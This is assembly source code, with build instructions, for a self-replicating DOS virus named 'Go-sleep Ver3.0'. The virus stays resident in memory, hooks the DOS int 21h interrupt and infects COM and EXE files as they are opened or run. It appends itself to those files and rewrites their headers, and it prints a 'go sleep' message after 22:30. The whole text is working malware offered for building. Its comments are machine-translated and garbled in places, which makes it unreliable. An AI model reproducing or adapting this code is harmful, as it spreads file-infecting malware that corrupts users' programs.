This program is d by the V0 virus modification upgrade and come
To have a certain contagious ability under DOS
; 32-bit programming is applied in this program part
; The production method is as follows
; Tasm32 Dv1;
; Tlink Dv1;
;D Ebug Dv1.exe
;-N dv1.com
;-W
; q
; finally generate the Dv1.com virus program
Off Equ Offset
DOSMCB struc;D OS Memory control chain structure (partial)
Flag db?; is ' M ' is not the last piece; is ' Z ' is the last piece
Owner DW?; is 008: is all system; 0 is unused memory block
Sizes DW?; This block size, calculated by section (1 =10h bytes)
DOSMCB Ends
Exeheader Struc; EXE file header structure
Flags DW ' ZM '; EXE file flag
Modsize DW?; EXE file last page of bytes
Pages DW?; EXE file pages (1 pages 512 bytes)
Reloc DW?; EXE files from the number of anchor items
Mesize DW?; Number of header sections in this article
Minmem DW?; The minimum memory (section) required by the program
Maxmem DW?; The maximum memory required by the program (section)
STARTSS DW?; program SP initial value
STARTSP DW?; program relative SS initial value
CheckSum DW?; file header check and
StartIP DW?; program IP initial value
Startcs DW?; program relative to CS initial value
Relocoff DW?; offset from positioning information
Exeheader Ends
Virussize=off @ @End-off @ @Start; (virus size)
Virusmemsize=off @ @MemEnd-off @ @Start; (the amount of memory required by the virus)
.386
. Model Small
. Code
Org 100h, written in COM format
@ @Start:; virus boot block
Pusha, saving all universal registers
MOV AX,4D4DH
int 21h; whether memory resides (custom interrupts)
CMP AX,4D4DH
JZ short @ @ExecOldApp; no, call the installation module
Call @ @Install
@ @ExecOldApp:
MOV ah,2ch
int 21h; Get system time
CMP cx,22*100h+30; (CMP time: 22:30)
JB Short @ @TestFlag; no display message is invoked until 22:30
Call @ @DisplayMsg, calling performance block
@ @TestFlag:
A CLC is a CLC instruction, indicating a COM file (if it is changed to STC when it is transmitted)
JC Short @ @IsExeApp
@ @IsComApp:
Call @ @GetOldComAppCode
Oldappcode DW 20CDH 20CDH is an int 20h command to return to Dos
DW 0000h; Here to save the original com file header 4 bytes of information
@ @GetOldComAppCode:
Pop si; get Oldappcode's address
MOV di,100h
Cld
Lodsd
stosd; restore original COM head 4 bytes
Popa; restore all general-purpose mail
Push word ptr 100h
RET; to execute the original COM program
@ @IsExeApp:
Popa; restore all general-purpose mail
CLI; To turn off interrupts when changing the stack pointer
mov sp,es; get PSP (SP=PSP section address)
Add sp,10h
Spadddata DW 0c481h;0bch is the Add sp,xxxx directive
OLDAPPSS DW 000h; original EXE file SS relative value
MOV ss,sp; compute the original program stack and restore
MOVEDATATOSP db 0bch 0bch is mov sp,xxxx instruction
OLDAPPSP DW 000h; original EXE file SP value
STI; break off from a new start
Push AX
mov ax,es; get PSP (AX=PSP section address)
Add ax,10h
Axadddata db 005h 05h is the add ax,xxxx instruction, calculate the original program CS value
Oldappcs DW 000h; original EXE file CS relative value
MOVZX esp,sp, converting to 32-bit [ESP] Stack-addressing
Xchg AX,[ESP]; recovery ax instead of "Xchg AX,[SP]" 16-bit does not support [SP] Stack-Addressing
Pushworddata db 068h 068h is a push word ptr xxxx instruction
Oldappip DW 000h; original EXE file IP value
RETF to execute the original EXE program
@ @Install:
Push DS
Push es; Save segment Registers
MOV Ax,ds
Dec ax; Get your own MCB structure segment, which is in front of the program's PSP
@ @ContFindLastMcb:
MOV Ds,ax
CMP Ds:[flag], ' Z '; is that the last piece?
JZ Short @ @FoundLastMcb
Add ax,ds:[sizes]
Inc AX calculates the next MCB segment = This block segment address + this block size +1
JMP Short @ @ContFindLastMcb
@ @FoundLastMcb:
Sub ds:[sizes], (virusmemsize/10h) +1; Subtract the last chunk of the virus from the amount of memory required (number of sections)
Add ax,ds:[sizes]
Inc AX; Compute the address of the virus in the high-end RAM (that is, the space segment in the last piece)
MOV Es,ax
XOR Di,di
Push CS
Pop ds; Reset data segment
Call @ @GetVirusBase
@ @GetVirusBase:
Pop si
Sub Si,off @ @GetVirusBase-off @ @Start; get virus first address
MOV cx,virussize
Cld
Rep MOVSB; carry the virus to a high-end address
Sub ax,10h; Compute the segment address of the high-end virus (for the virus to be offset, so subtract 10h)
MOV Ds,ax
@ @ContInstall:
MOV ax,3521h
int 21h; takes the interrupt vector of int 21h and saves
MOV ds:oldint21seg,es
MOV ds:oldint21off,bx
Lea dx,@ @NewInt21
MOV ax,2521h
int 21h; set new int 21h processor to @ @NewInt21
Pop es
Pop ds
Ret
@ @NewInt21:; new Int21 H Service Program (infection block)
CMP AX,4D4DH
JNZ Short @ @NextHook
Iret; is a custom interrupt, direct return
@ @NextHook:
CMP AH,4BH
JZ Short @ @MyBeCom
CMP ah,43h
JZ Short @ @MyBeCom
CMP AH,3DH
JZ short @ @MyBeCom intercept 4b,43,3d dos function
@ @JmpOldInt21:
CLI; Before entering the int21h, need to turn off the interrupt!
Jmpfar db 0eah, far jump instruction JMP xxxx:xxxx
Oldint21off DW?
Oldint21seg DW?
@ @CallInt21:; analog int 21h Instruction
Pushf
Push CS
Call @ @JmpOldInt21
Ret
@ @MyBeCom:; entry parameter ds:dx= com filename string ending with 0
Pusha
Push DS
MOV si,dx
XOR Al,al
@ @ContFindExtName:; Find extension
Inc si
CMP [Si],al
JNZ Short @ @ContFindExtName
MOV eax,[si-4]
or eax,20202020h; converting to lowercase letters
cmp eax, ' MOC. ' is a. com file?
JZ Short @ @IsComFile
cmp eax, ' exe. '; is an. exe file?
JZ Short @ @IsExeFile
@ @ExitOpt:
Pop ds
Popa
JMP Short @ @JmpOldInt21
@ @IsComFile:
MOV ax,3d02h
Call @ @CallInt21 3DH, open com file
JC Short @ @OptComFalse; failed
MOV Bx,ax
Push CS
Pop ds; Reset data segment
mov ds:byte ptr[@ @TestFlag],0f8h; set to the CLC directive, which means that the infected COM file
Lea Dx,oldappcode
MOV cx,4
MOV ah,3fh
int 21h; Read File header 4 bytes
JC Short @ @CloseComFile
MOV si,dx
CMP word ptr[si], ' ZM '; exe file (whether COM file cannot be judged by extension only)
JZ short @ @CloseComFile; it's not contagious.
CMP byte ptr[si+3], ' V ', infected virus flag
JZ short @ @CloseComFile; it means the program is infected.
MOV ax,4202h
XOR cx,cx
XOR DX,DX
int 21h; Moves the file pointer to the end of the file, returning the dx:ax= file length
or DX,DX
JNZ short @ @CloseComFile; The file is too large to be infected
MOV Dx,ax
Add Ax,virussize
JC Short @ @CloseComFile; files are too large to infect
CMP ax,0fd00h
JA short @ @CloseComFile; The file is too large to be infected
Sub dx,03; calculate the offset of jmp virus
MOV ds:jmpoffset,dx
Lea dx,@ @Start
MOV cx,virussize
MOV ah,40h
int 21h; write virus to file tail
MOV ax,4200h
XOR cx,cx
XOR DX,DX
int 21h; Move the file pointer to the top of the file
MOV cx,04h
Lea dx,@ @JmpVirus
MOV ah,40h
int 21h; write jmp virus and Virus flag 4 bytes to file header
@ @CloseComFile:
MOV Ah,3eh
int 21h; closing file
@ @OptComFalse:
JMP Short @ @ExitOpt
@ @IsExeFile:
MOV ax,3d02h
Call @ @CallInt21 3DH, open exe file
JC @ @OptExeFalse, failure
MOV Bx,ax
Push CS
Pop ds; Reset data segment
mov ds:byte ptr[@ @TestFlag],0f9h; set to STC directive, which means that the infection is EXE file.
Lea Dx,myexeheader
MOV cx,size exeheader
MOV ah,3fh
int 21h; Read File header 4 bytes
JC @ @CloseExeFile
CMP AX,CX
JB @ @CloseExeFile
MOV si,dx
CMP word ptr[si. Flags], ' ZM '; exe file (whether EXE file cannot be judged by extension only)
JNZ @ @CloseExeFile; No, it's not contagious.
cmp [SI. CheckSum], ' VV '; Is there an infected virus flag
JZ @ @CloseExeFile; it means the program is infected.
MOV ax,4202h
XOR cx,cx
XOR DX,DX
int 21h; Moves the file pointer to the end of the file, returning the dx:ax= file length
CMP dx,8h
JA short @ @CloseExeFile; The file is too large, possibly a Windows application
SHL edx,16
MOV Dx,ax
push edx; Save File size
SHR edx,4
Sub Dx,[si. Mesize]; Calculating the new relative CS in the EXE program of the virus
and ax,0fh the new Ip value of the virus in the EXE program (0=<IP<10H)
mov cx,dx; cx=dx= New relative CS value
Xchg [Si. Startcs],dx
mov ds:[oldappcs],dx; modify relative CS value, save the original relative CS value
Xchg [Si. Startss],cx
mov ds:[oldappss],cx; modify relative SS value, save the original relative SS value
Xchg [Si. Startip],ax
mov ds:[oldappip],ax; Modify IP value, save original IP value
XOR Ax,ax
Xchg [Si. Startsp],ax, modifying SP values, saving original SP values
MOV Ds:[oldappsp],ax
mov [SI. CheckSum], ' VV '; set the infection flag
Pop edx; popup file size
MOV ecx,virussize
Add edx,ecx; Calculate the size of the file after infection
MOV ax,dx
and AX,1FFH the modsize of the infected file
mov [SI. Modsize],ax
Add EDX,1FFH
SHR edx,9; Compute the pages of the infected file
mov [SI. Pages],dx
Lea dx,@ @Start
MOV ah,40h
int 21h; write virus to file tail
MOV ax,4200h
XOR cx,cx
XOR DX,DX
int 21h; Move the file pointer to the top of the file
MOV cx,size exeheader
Lea Dx,myexeheader
MOV ah,40h
int 21h; Write file headers to file header
@ @CloseExeFile:
MOV Ah,3eh
int 21h; closing file
@ @OptExeFalse:
JMP @ @ExitOpt
@ @JmpVirus:
Jumpnear DB 0e9h, near-transfer instruction JMP near XXXX
Jmpoffset DW?
Virusflag db ' V '; virus flag is ' V ' character
@ @DisplayMsg:
Pop DX
Push DX
Add Dx,off @ @Message-off @ @TestFlag; calculate the offset of @ @Message
Push DS
Push CS
Pop ds
MOV ah,09h
int 21h; display information, "The Night is deep, you should sleep!"
Pop ds
Ret
@ @Message:
DB 0ah,0dh,07h
DB ' Night is deep,you must go sleep! '
DB 0AH,0DH, ' $ '
DB ' Go-sleep Ver3.0 by WHG 2001.5.2 '
@ @End:
Myexeheader db size Exeheader dup (?)
@ @MemEnd:
End @ @Start